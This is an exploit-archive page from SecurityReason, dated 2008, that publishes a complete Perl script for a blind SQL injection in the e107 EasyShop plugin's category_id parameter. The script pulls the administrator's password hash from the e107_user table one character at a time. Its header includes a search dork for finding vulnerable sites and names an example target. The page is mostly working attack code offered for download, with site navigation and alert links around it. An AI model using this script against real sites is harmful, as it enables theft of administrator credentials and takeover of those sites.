SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit


Arrow  ExploitAlert : 4994
  SecurityAlert : 4531 (Exploit Details)
  Milw0rm ID : 6852
Arrow  Credit : StAkeR
Arrow  Date : 28.10.2008

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

#!/usr/bin/perl
# ------------------------------------------------------------
# e107 (Plugin EasyShop) Remote Blind SQL Injection Exploit
# By StAkeR[at]hotmail[dot]it
# Dork allinurl: e107_plugins/easyshop/easyshop.php
# Example http://www.clan-designs.co.uk
# easyshop/easyshop.php?choose_category=1&category_id= or 1=1
# easyshop/easyshop.php?choose_category=1&category_id= and 1=2
# ------------------------------------------------------------

use strict;
use warnings;
use LWP::UserAgent;
use URI::Escape;

my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1);

my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
my @chars = (48..57, 97..102);
my $http = new LWP::UserAgent;

for(0..32)
{
foreach $ord(@chars)
{
$send = " or ascii(substring((select user_password from e107_user
where user_id=1),$uid,1))=$ord/*";
$send = uri_escape($send);

$request =
$http->get($host."/e107_plugins/easyshop/easyshop.php?choose_category=1&cat
egory_id=-1".$send);

if($request->is_success and $request->content !~ /No products
available/i)
{
$hash .= chr($ord);
$uid++;
}
}
}

if(defined $hash)
{
print STDOUT "[+] MD5: $hash\n";
exit;
}
else
{
print STDOUT "[?] Exploit Failed!\n";
exit;
}





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.